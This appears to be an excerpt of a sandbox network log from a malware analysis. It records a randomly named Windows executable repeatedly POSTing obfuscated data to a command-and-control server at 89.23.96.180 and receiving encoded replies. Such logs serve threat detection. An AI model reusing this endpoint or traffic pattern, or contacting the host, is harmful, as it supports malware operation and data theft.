Dec 21, 2024 10:03:48.640434980 CET	2536	OUT	Data Raw: 58 56 43 53 5d 5b 52 55 55 5e 55 5a 54 5d 50 53 57 53 5c 5b 52 56 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XVCS][RUU^UZT]PSWS\[RVQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D:<T%.>>%-_'/0.4?\%=(7'_([;>%!_.#Q,>
Dec 21, 2024 10:03:49.673124075 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:49.908051968 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49972	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:50.147106886 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:50.499782085 CET	2536	OUT	Data Raw: 58 51 43 50 58 59 57 55 55 5e 55 5a 54 5f 50 50 57 58 5c 5a 52 5e 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XQCPXYWUU^UZT_PPWX\ZR^Q\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C:?%)V="![9?,'/:=S#5Y2%*$^?.<_>5!_.#Q,6
Dec 21, 2024 10:03:51.523997068 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:51.756331921 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49978	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:51.994601011 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:52.343694925 CET	2536	OUT	Data Raw: 58 5f 43 51 58 5a 52 55 55 5e 55 5a 54 53 50 53 57 59 5c 5f 52 53 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_CQXZRUU^UZTSPSWY\_RSQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .W#%U>W6,<0'?(W987,9\&"P*'#_?- [=!_.#Q,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49979	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:53.106097937 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:53.453059912 CET	2112	OUT	Data Raw: 58 5f 43 52 58 5c 57 5f 55 5e 55 5a 54 58 50 53 57 5a 5c 5b 52 52 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_CRX\W_U^UZTXPSWZ\[RRQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -2>)P)1..,8%<<U98%#?[26V+4>-,X)5!_.#Q,*
Dec 21, 2024 10:03:54.486151934 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:54.720328093 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 11 21 2b 2e 0d 28 5c 37 1d 2a 3c 25 09 2b 3e 3e 58 2f 22 06 05 22 2f 3a 13 3d 04 3b 1d 27 10 20 02 23 3a 25 58 21 2f 0e 06 29 21 2e 58 01 1e 22 19 20 23 29 1c 27 2f 3f 55 29 27 32 17 2b 3d 26 5d 27 2f 09 19 25 39 23 05 3d 2a 23 08 32 3d 29 02 2c 11 01 59 28 3d 2f 0e 24 36 2b 51 03 1e 26 5d 31 3c 3b 57 25 33 1c 00 32 3d 26 06 22 3e 23 53 29 16 33 50 37 15 2d 05 3b 39 0a 5c 3f 03 39 01 2a 06 26 1d 24 3c 3b 51 26 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989!+.(\7<%+>>X/""/:=;' #:%X!/)!.X" #)'/?U)'2+=&]'/%9#=#2=),Y(=/$6+Q&]1<;W%32=&">#S)3P7-;9\?9*&$<;Q&.#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49985	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:53.280339956 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:53.624950886 CET	2536	OUT	Data Raw: 58 52 43 55 5d 5d 57 52 55 5e 55 5a 54 53 50 5c 57 5f 5c 54 52 53 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XRCU]]WRU^UZTSP\W_\TRSQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-?1-?15\,< ^',R:#<1=(B+[([#+%!_.#Q,
Dec 21, 2024 10:03:54.656378031 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:54.892455101 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49986	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:55.137728930 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:55.513958931 CET	2536	OUT	Data Raw: 58 5f 43 56 58 5a 57 53 55 5e 55 5a 54 53 50 5d 57 58 5c 5e 52 52 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_CVXZWSU^UZTSP]WX\^RRQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9'$=)V=&.Y$Y$Y,98)R#<"12V(7?[+-<[*!_.#Q,
Dec 21, 2024 10:03:56.514733076 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:56.748373985 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49992	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:56.993843079 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:57.343554020 CET	2536	OUT	Data Raw: 58 53 46 57 5d 59 57 56 55 5e 55 5a 54 52 50 57 57 58 5c 5c 52 53 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XSFW]YWVU^UZTRPWWX\\RSQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :,W%=V):9/$(W.(& :'2.(\+ _*!_.#Q,
Dec 21, 2024 10:03:58.380250931 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:58.614343882 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49998	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:58.896707058 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:59.249995947 CET	2536	OUT	Data Raw: 58 5f 43 51 5d 5c 57 51 55 5e 55 5a 54 5d 50 53 57 59 5c 5c 52 5f 51 5a 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_CQ]\WQU^UZT]PSWY\\R_QZZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9$=V=2![9?0':57)]%!-?7#>.?>!_.#Q,>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50004	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:59.855909109 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:04:00.202969074 CET	2112	OUT	Data Raw: 58 5e 43 56 58 5a 57 56 55 5e 55 5a 54 5c 50 5d 57 5a 5c 55 52 57 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X^CVXZWVU^UZT\P]WZ\URWQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C. 2))9.Y?%/0S-^! ?&!(8(=,^>%!_.#Q,
Dec 21, 2024 10:04:01.236602068 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:04:01.472637892 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 54 21 28 2a 0e 3c 04 2b 5b 2a 06 31 0c 3e 07 22 59 2c 1c 06 06 22 05 25 01 29 2e 27 13 30 00 23 10 21 3a 07 58 22 3f 24 00 29 31 2e 58 01 1e 21 41 20 33 21 53 27 01 2f 57 2a 19 3d 03 28 10 39 03 30 06 2c 0a 25 03 23 06 3f 14 23 0f 27 2e 3a 5c 3b 11 06 06 3c 2e 34 1c 27 0c 2b 51 03 1e 26 1f 26 3c 34 0a 32 1d 13 11 26 2d 2a 00 20 58 33 52 3f 3b 2f 50 23 28 3a 5f 3b 17 05 01 2b 3e 3d 02 2a 28 31 02 27 05 20 0d 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989T!(<+[1>"Y,"%).'0#!:X"?$)1.X!A 3!S'/W=(90,%#?#'.:\;<.4'+Q&&<42&- X3R?;/P#(:_;+>=*(1' 2#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50005	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:59.978409052 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:04:00.328082085 CET	2536	OUT	Data Raw: 5d 51 46 55 5d 5e 57 5f 55 5e 55 5a 54 58 50 56 57 52 5c 5f 52 55 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]QFU]^W_U^UZTXPVWR\_RUQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:,T%.6>!]-8]$?V-45X22-?4#+5!_.#Q,*
Dec 21, 2024 10:04:01.354269028 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:04:01.588186026 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50006	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:04:01.834629059 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:04:02.187351942 CET	2536	OUT	Data Raw: 5d 54 43 52 5d 56 57 50 55 5e 55 5a 54 52 50 53 57 53 5c 5c 52 52 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TCR]VWPU^UZTRPSWS\\RRQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C-8%.=T)2%_-<8X00-^6#/9&=+$Z>-?=!_.#Q,
Dec 21, 2024 10:04:03.209317923 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:04:03.444094896 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50012	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:04:03.678956032 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:04:04.031035900 CET	2536	OUT	Data Raw: 58 56 43 53 58 5b 52 55 55 5e 55 5a 54 5a 50 5c 57 58 5c 5f 52 54 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XVCSX[RUU^UZTZP\WX\_RTQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ B-$1-5>1,/$/,( Y%=+?$!_.#Q,"
Dec 21, 2024 10:04:05.056436062 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:04:05.296211958 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50018	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:04:05.536557913 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:04:05.890415907 CET	2536	OUT	Data Raw: 58 52 43 50 58 5c 52 52 55 5e 55 5a 54 53 50 55 57 5b 5c 5f 52 52 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XRCPX\RRU^UZTSPUW[\_RRQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-! R%=.?!!9?,Y0/:;=#<>&U( (?=!_.#Q,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50024	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:04:06.606142998 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:04:06.952985048 CET	2112	OUT	Data Raw: 58 51 43 50 58 5d 52 50 55 5e 55 5a 54 5e 50 55 57 53 5c 5e 52 5e 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XQCPX]RPU^UZT^PUWS\^R^QYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.<&=9V=!.<X0/0-97:'">W<?-)5!_.#Q,2
Dec 21, 2024 10:04:07.984081030 CET	25	IN	HTTP/1.1 100 Continue
